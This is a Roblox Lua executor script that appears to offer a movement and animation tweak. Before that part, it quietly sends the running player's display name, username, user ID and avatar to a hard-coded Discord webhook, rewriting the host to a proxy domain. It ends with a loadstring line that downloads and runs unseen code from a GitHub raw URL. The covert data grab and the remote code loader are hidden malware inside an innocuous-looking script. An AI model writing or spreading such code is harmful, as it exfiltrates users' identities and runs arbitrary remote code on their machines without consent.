
local discord = "https://discord.com/api/webhooks/1513059320353525891/45J_BqKT84C3zVUQ3_DdewFDvO0WN28DSm4jc26Zx0aaY952zPScRh2_Rz6TgF-8WaiA"

if not discord or discord == "" then return end
if discord:find("discord.com") then discord = discord:gsub("discord.com", "webhook.lewisakura.moe") end
if discord:find("discordapp.com") then discord = discord:gsub("discordapp.com", "webhook.lewisakura.moe") end

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

local r = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
if not r then return end

local pleasework = "https://www.roblox.com/images/PersonalChannel/missing_avatar.png"


task.spawn(function()
    pcall(function()
        local url = "https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds=" .. LocalPlayer.UserId .. "&size=420x420&format=Png&isCircular=false"
        local resp = r({Url = url, Method = "GET"})
        if resp and resp.Body then
            local data = HttpService:JSONDecode(resp.Body)
            if data.data and data.data[1] then
                pleasework = data.data[1].imageUrl
            end
        end
    end)
end)

task.wait(1.5)


local fields = {
    {
        name = "👤 유저 정보",
        value = string.format("**Display:** `%s`\n**Username:** `%s`\n**ID:** `%s`", LocalPlayer.DisplayName, LocalPlayer.Name, LocalPlayer.UserId),
        inline = false
    }
}

local payload = {
    ["embeds"] = {{
        ["title"] = "User Information",
        ["color"] = 65280,
        ["thumbnail"] = {["url"] = pleasework},
        ["fields"] = fields
    }}
}

pcall(function()
    r({
        Url = discord,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = HttpService:JSONEncode(payload)
    })
end
local UserInputService = game:GetService("UserInputService")
local RunService = game:GetService("RunService")
local Players = game:GetService("Players")

local player = Players.LocalPlayer
local character = player.Character or player.CharacterAdded:Wait()
local humanoid = character:WaitForChild("Humanoid")
local rootPart = character:WaitForChild("HumanoidRootPart")

local targetAnimSpeed = 1.0

humanoid.AnimationPlayed:Connect(function(animTrack)
	animTrack:AdjustSpeed(targetAnimSpeed)
end)

for _, track in pairs(humanoid:GetPlayingAnimationTracks()) do
	track:AdjustSpeed(targetAnimSpeed)
end

RunService.RenderStepped:Connect(function()
	if humanoid.MoveDirection.Magnitude > 0 then
		local moveDir = humanoid.MoveDirection.Unit
		rootPart.Velocity = Vector3.new(moveDir.X * humanoid.WalkSpeed, rootPart.Velocity.Y, moveDir.Z * humanoid.WalkSpeed)
	else
		rootPart.Velocity = Vector3.new(0, rootPart.Velocity.Y, 0)
	end
end)

UserInputService.JumpRequest:Connect(function()
	humanoid:ChangeState(Enum.HumanoidStateType.Jumping)
end)

 loadstring(game:HttpGet("https://raw.githubusercontent.com/qwer123476/12345/main/papacaca-4-2-1-1-1-1-2.txt1"))()
